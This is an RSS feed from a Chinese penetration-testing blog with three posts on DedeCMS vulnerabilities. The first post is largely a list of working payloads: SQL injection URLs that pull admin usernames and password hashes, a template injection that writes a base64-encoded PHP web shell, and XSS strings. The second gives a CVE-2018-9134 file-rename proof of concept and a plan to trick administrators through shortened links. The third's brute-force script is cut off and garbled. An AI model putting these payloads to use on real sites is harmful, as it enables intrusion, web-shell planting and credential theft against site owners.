<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>织梦 &#8211; ChaBug安全</title>
	<atom:link href="/tags/%E7%BB%87%E6%A2%A6/feed" rel="self" type="application/rss+xml" />
	<link>/</link>
	<description>一个分享知识、结识伙伴、资源共享的博客</description>
	<lastBuildDate>Fri, 23 Aug 2019 01:26:10 +0000</lastBuildDate>
	<language>zh-CN</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	<generator>https://wordpress.org/?v=5.5.5</generator>
	<item>
		<title>dedecms漏洞汇总</title>
		<link>/web/396.html</link>
		
		<dc:creator><![CDATA[Y4er]]></dc:creator>
		<pubDate>Fri, 13 Apr 2018 02:38:00 +0000</pubDate>
				<category><![CDATA[渗透测试]]></category>
		<category><![CDATA[dedecms]]></category>
		<category><![CDATA[汇总]]></category>
		<category><![CDATA[漏洞]]></category>
		<category><![CDATA[织梦]]></category>
		<guid isPermaLink="false">/?p=325</guid>

					<description><![CDATA[@泡泡龙等了很久的文章了，如果本文有错欢迎评论指点，欢迎补充。 Dedecms V5.7 后台文件重命名 /web/81/ Dedecm...]]></description>
										<content:encoded><![CDATA[<blockquote><p>@泡泡龙等了很久的文章了，如果本文有错欢迎评论指点，欢迎补充。</p></blockquote>
<h1>Dedecms V5.7 后台文件重命名</h1>
<p>/web/81/</p>
<h1>Dedecms V5.7 后台任意代码执行</h1>
<p>/web/79/</p>
<h1>解决历史难题 &#8211; DEDECMS <span class="wpcom_tag_link"><a href="/tags/%e7%bb%87%e6%a2%a6" title="织梦" target="_blank">织梦</a></span>找后台目录</h1>
<p>/web/51/</p>
<h1><span class="wpcom_tag_link"><a href="/tags/dedecms" title="dedecms" target="_blank">dedecms</a></span>爆绝对路径</h1>
<pre><code>/member/templets/menulit.php
/plus/paycenter/alipay/return_url.php
/plus/paycenter/cbpayment/autoreceive.php
/paycenter/nps/config_pay_nps.php
/plus/task/dede-maketimehtml.php
/plus/task/dede-optimize-table.php
/plus/task/dede-upcache.php</code></pre>
<blockquote><p>以下<span class="wpcom_tag_link"><a href="/tags/%e6%bc%8f%e6%b4%9e" title="漏洞" target="_blank">漏洞</a></span>来自互联网收集</p></blockquote>
<h1>DedeCMS全版本通杀SQL注入漏洞利用</h1>
<p>2016年7月11日<br />
<a href="http://www.weixianmanbu.com/article/157.html">http://www.weixianmanbu.com/article/157.html</a></p>
<h1>Dedecms 5.6 rss注入漏洞</h1>
<pre><code>http://www.test.com/plus/rss.php?tid=1&amp;_Cs[][1]=1&amp;_Cs[2)) AND "'" AND updatexml(1,(SELECT CONCAT(0x5b,uname,0x3a,MID(pwd,4,16),0x5d) FROM dede_admin),1)#'][0]=1  </code></pre>
<h1>DedeCms v5.6 嵌入恶意代码执行漏洞</h1>
<p>注册会员，上传软件：本地地址中填入</p>
<pre><code>a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}  </code></pre>
<p>发表后查看或修改即可执行</p>
<pre><code>a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}   </code></pre>
<p>生成x.php 密码xiao，直接生成一句话。</p>
<h1>Dede 5.6 GBK SQL注入漏洞</h1>
<pre><code>http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe''")/&gt;
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7''"&gt;  </code></pre>
<p>可看见错误信息</p>
<ol>
<li>访问 <code>http://www.abc.com/data/mysql_error_trace.php</code> 看到以下信息证明注入成功了。</li>
</ol>
<pre><code>int(3) Error: Illegal double '1024e1024' value found during parsing
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?&gt; </code></pre>
<ol>
<li>执行dede.rar里的文件 test.html，注意 form 中 action 的地址是</li>
</ol>
<p>按确定后的看到第2步骤的信息表示文件木马上传成功.</p>
<h1>织梦(DedeCms)plus/infosearch.php 文件注入漏洞</h1>
<pre><code>http://localhost/plus/infosearch.php?action=search&amp;q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*  </code></pre>
<p>DEDECMS跨站及爆绝对路径漏洞<br />
提交：</p>
<pre><code>http://127.0.0.1/dc/include/jump.php?gurl= 会跳转到/</code></pre>
<p>新手朋友会认为这就是这个跨站的利用了，其实不然，我们可以尝试去闭合他！但PHP有gpc限制，我们该怎么绕？<br />
提交：</p>
<pre><code>http://127.0.0.1/dc/include/jump.php?gurl=%23"alert(/00day.cn/)/*  </code></pre>
<h1>Multiple Cross-Site Scripting Vulnerabilities in DedeCms v5.x</h1>
<pre><code># .: Multiple Cross-Site Scripting Vulnerabilities in DedeCms v5.x
# .: [Author] Depo2 - TpTLabs.com
# .: [Affected versions] http://www.dedecms.com/ - DedeCms v5.x
# .: [Credit] The disclosure of these issues has been credited to Depo2
# .: [Classification]
# Attack Type: Input Manipulation
# Impact: Loss of Integrity
# Fix: N/A Public release vulnz: {26-08-2008 Sun}
# Class Input Validation Error
# Original Advisory http://depo2.nm.ru/DedeCmsv5.x_XSS.txt
# Other Advisory http://www.xssing.com/index.php?x=3&amp;y=53
- XSS -
[DedeCms WebSite]/dede/catalog_tree.php?f=form1&amp;opall=1&amp;v=typeid&amp;bt=[XSS]
[DedeCms WebSite]/dede/catalog_tree.php?f=form1&amp;opall=1&amp;v=[XSS]
[DedeCms WebSite]/dede/catalog_tree.php?f=[XSS]
[DedeCms WebSite]/dede/content_list.php?arcrank=[XSS]
[DedeCms WebSite]/dede/content_list.php?dopost=listArchives&amp;nowpage=1&amp;totalresult=0&amp;arcrank=[XSS]&amp;cid=[XSS/SQL]&amp;keyword=[XSS]+&amp;orderby=[XSS/SQL]&amp;imageField=%CB%D1%CB%F7
[DedeCms WebSite]/dede/content_list.php?channelid=[XSS]&amp;cid=0&amp;adminid=[XSS]
[DedeCms WebSite]/include/dialog/select_images.php?f=form1.picname&amp;imgstick=[XSS]
[DedeCms WebSite]/include/dialog/select_images.php?f=[XSS]
[DedeCms WebSite]/dede/login.php?gotopage=[XSS]
[DedeCms WebSite]/dede/article_keywords_select.php?f=[XSS]
[DedeCms WebSite]/dede/file_pic_view.php?activepath=[XSS]
[DedeCms WebSite]/member/login.php?gourl=[XSS]
[DedeCms WebSite]/dede/pic_view.php?activepath=[XSS]  </code></pre>
<h1>Php Path Discusion</h1>
<pre><code>[DedeCms WebSite]/include/dialog/  </code></pre>
<h1>XSRF</h1>
<pre><code>[DedeCms WebSite]/dede/sys_info.php? have XSRF
edit___cfg_beian,edit___cfg_keywords etc.. parameter not checking evil code
if attacker wright a "end of textarea"  tag thats give XSS alert :)
[XSS Code] :'"&gt;alert(document.cookie)  </code></pre>
<h1>织梦(dedecms)2007 group/search.php注入漏洞</h1>
<pre><code>http://127.0.0.1/dg/group/search.php?sad=g&amp;keyword=%cf'  </code></pre>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Dedecms V5.7 后台文件重命名[CVE-2018-9134]</title>
		<link>/web/392.html</link>
		
		<dc:creator><![CDATA[Y4er]]></dc:creator>
		<pubDate>Sun, 01 Apr 2018 15:50:38 +0000</pubDate>
				<category><![CDATA[渗透测试]]></category>
		<category><![CDATA[cve]]></category>
		<category><![CDATA[dedecms]]></category>
		<category><![CDATA[织梦]]></category>
		<guid isPermaLink="false">/?p=321</guid>

					<description><![CDATA[原文地址 https://xz.aliyun.com/t/2234 Dedecms V5.7版本后台可实现对于文件的重命名，可将上传的任意文件重名为php文件，导致getshell...]]></description>
										<content:encoded><![CDATA[<blockquote><p>原文地址 <a href="https://xz.aliyun.com/t/2234">https://xz.aliyun.com/t/2234</a></p></blockquote>
<p>Dedecms V5.7版本后台可实现对于文件的重命名，可将上传的任意文件重名为php文件，导致getshell。</p>
<p>该漏洞的逻辑比较简单，就从漏洞的入口文件开始看，漏洞的入口文件是<code>dede/file_manage_control.php</code>，其部分源码如下：<br /><img src="https://xzfile.aliyuncs.com/media/upload/picture/20180330183055-6e031b8c-3405-1.png" alt="" title=""></p>
<p>重点就在于这里的if，由于dede采取的是伪全局变量注册机制，导致在未经过滤的情况下我们可声明任意变量。在该文件中，前面只是简单的验证身份是否正确，并没有对于变量进行任何过滤。也就是说，我们可控$fmdo,$oldfilename,$newfilename这三个变量。</p>
<p>跟进RenameFile方法，文件位于<code>dede/file_class.php</code>：<br /><img src="https://xzfile.aliyuncs.com/media/upload/picture/20180330183056-6e171812-3405-1.png" alt="" title=""></p>
<p>在这个方法中，对于传入的变量只是进行参数拼接操作，就是我们传入的参数前加上web服务的根目录的绝对路径。对于之后的变量没有任何过滤。导致我们可操作自行上传的文件。从而实现将任意类型文件重命名为php文件。</p>
<p>利用方式：<br />首先随便找个上传点，上传合法文件。获取上传之后的文件路径。<br />这里我找的是前台-&gt;会员中心-&gt;附件管理，从这上传一个zip文件，内容就是phpinfo()<br /><img src="https://xzfile.aliyuncs.com/media/upload/picture/20180330183056-6e274db8-3405-1.png" alt="" title=""></p>
<p>可以在源码里看到上传文件的路径：<br /><img src="https://xzfile.aliyuncs.com/media/upload/picture/20180330183056-6e344fa4-3405-1.png" alt="" title=""></p>
<p>接下来构造触发重命名payload：<br />将文件路径的值填入oldfilename参数，这里注意不要加反斜杠<br />newfilename的值就是我们要生成的木马文件的名称。（由于我的dede并不是放在web服务的根目录下，因此我这里需要加上<span class="wpcom_tag_link"><a href="/tags/dedecms" title="dedecms" target="_blank">dedecms</a></span>/）<br />fmdo构造为rename即可<br />最终生成以下poc:</p>
<pre><code>http://localhost/dedecms2/dede/file_manage_control.php?fmdo=rename&amp;oldfilename=dedecms2/uploads/userup/1/151QM125-42I.zip&amp;newfilename=dedecms2/wisdom.php</code></pre>
<p>执行之后访问：<code>http://localhost/dedecms2/wisdom.php</code></p>
<p>配合存储型xss可getshell。</p>
<p>修复方案：在file_class.php中过滤$newname参数，或者file_manage_control.php中过滤$newfilename参数，判断文件后缀是否为php</p>
<p><a href="https://xz.aliyun.com/u/2395">mochazz</a>:可以利用这个文件名任意修改的漏洞结合CSRF以及一点点社工手段打出组合拳。具体手法如下：</p>
<ul>
<li>利用dede前台会员上传点上传文件，获取路径</li>
<li>构造攻击url</li>
<li>将一长长的恶意url变成短连接</li>
<li>社工网站管理员，让其点击</li>
<li>成功getshell</li>
</ul>
<p>不过有一点不够隐蔽，就是在管理员点击链接后，会提示成功修改文件名，这个可能会引起细心的管理员的警觉。</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>解决历史难题-DEDECMS织梦找后台目录</title>
		<link>/web/363.html</link>
		
		<dc:creator><![CDATA[Y4er]]></dc:creator>
		<pubDate>Mon, 26 Feb 2018 21:15:00 +0000</pubDate>
				<category><![CDATA[渗透测试]]></category>
		<category><![CDATA[dedecms]]></category>
		<category><![CDATA[后台]]></category>
		<category><![CDATA[目录]]></category>
		<category><![CDATA[织梦]]></category>
		<guid isPermaLink="false">/?p=253</guid>

					<description><![CDATA[原文 https://xianzhi.aliyun.com/forum/topic/2064 利用限制 仅针对windows系统 进入正题 首先看核心文件common.inc.ph...]]></description>
										<content:encoded><![CDATA[<blockquote><p>原文 <a href="https://xianzhi.aliyun.com/forum/topic/2064">https://xianzhi.aliyun.com/forum/topic/2064</a></p></blockquote>
<h1>利用限制</h1>
<p><strong>仅针对windows系统</strong></p>
<h1>进入正题</h1>
<p>首先看核心文件common.inc.php 大概148行左右</p>
<pre><code>if($_FILES)
{
    require_once(DEDEINC.'/uploadsafe.inc.php');
}</code></pre>
<p>uploadsafe.inc.php</p>
<pre><code>if( preg_match('#^(cfg_|GLOBALS)#', $_key) )
{
    exit('Request var not allow for uploadsafe!');
}
$$_key = $_FILES[$_key]['tmp_name']; //获取temp_name
${$_key.'_name'} = $_FILES[$_key]['name'];
${$_key.'_type'} = $_FILES[$_key]['type'] = preg_replace('#[^0-9a-z\./]#i', '', $_FILES[$_key]['type']);
${$_key.'_size'} = $_FILES[$_key]['size'] = preg_replace('#[^0-9]#','',$_FILES[$_key]['size']);
if(!empty(${$_key.'_name'}) &amp;&amp; (preg_match(&quot;#\.(&quot;.$cfg_not_allowall.&quot;)$#i&quot;,${$_key.'_name'}) || !preg_match(&quot;#\.#&quot;, ${$_key.'_name'})) )
{
    if(!defined('DEDEADMIN'))
    {
        exit('Not Admin Upload filetype not allow !');
    }
}
if(empty(${$_key.'_size'}))
{
    ${$_key.'_size'} = @filesize($$_key);
}
$imtypes = array
(
    &quot;image/pjpeg&quot;, &quot;image/jpeg&quot;, &quot;image/gif&quot;, &quot;image/png&quot;,
    &quot;image/xpng&quot;, &quot;image/wbmp&quot;, &quot;image/bmp&quot;
);
if(in_array(strtolower(trim(${$_key.'_type'})), $imtypes))
{
    $image_dd = @getimagesize($$_key);
    //问题就在这里，获取文件的size，获取不到说明不是图片或者图片不存在，不存就exit upload.... ,利用这个逻辑猜目录的前提是目录内有图片格式的文件。
    if (!is_array($image_dd))
    {
        exit('Upload filetype not allow !');
    }
}
......</code></pre>
<p>注意<code>$$_key</code>这一句，变量$key取自于$_FILE，由于$_FILE可控自然$key也可控,此处理论上是可以覆盖任意变量，但是前面有个正则判断不能出现<code>cfg_|GLOBALS</code>。(但是应该还可以覆盖其他变量此处感觉还可以深挖)</p>
<p>本人出发点是找个可以利用</p>
<pre><code>![3.png][3]
# Python版本</code></pre>
<h1>!/usr/bin/env python3</h1>
<h1>fixed bug by ChaBug</h1>
<h1>author = Mochazz</h1>
<p>import requests<br />import itertools<br />characters = &#8220;abcdefghijklmnopqrstuvwxyz0123456789_!~@$-+=()&#8221;  #加上了乱七八糟的符号<br />back_dir = &#8220;&#8221;<br />flag = 0<br />url = &#8220;http://192.168.1.9/tags.php&#8221;<br />data = {</p>
<pre><code>&quot;_FILES[mochazz][tmp_name]&quot; : &quot;./{p}</code></pre>
]]></content:encoded>
					
		
		
			</item>
	</channel>
</rss>
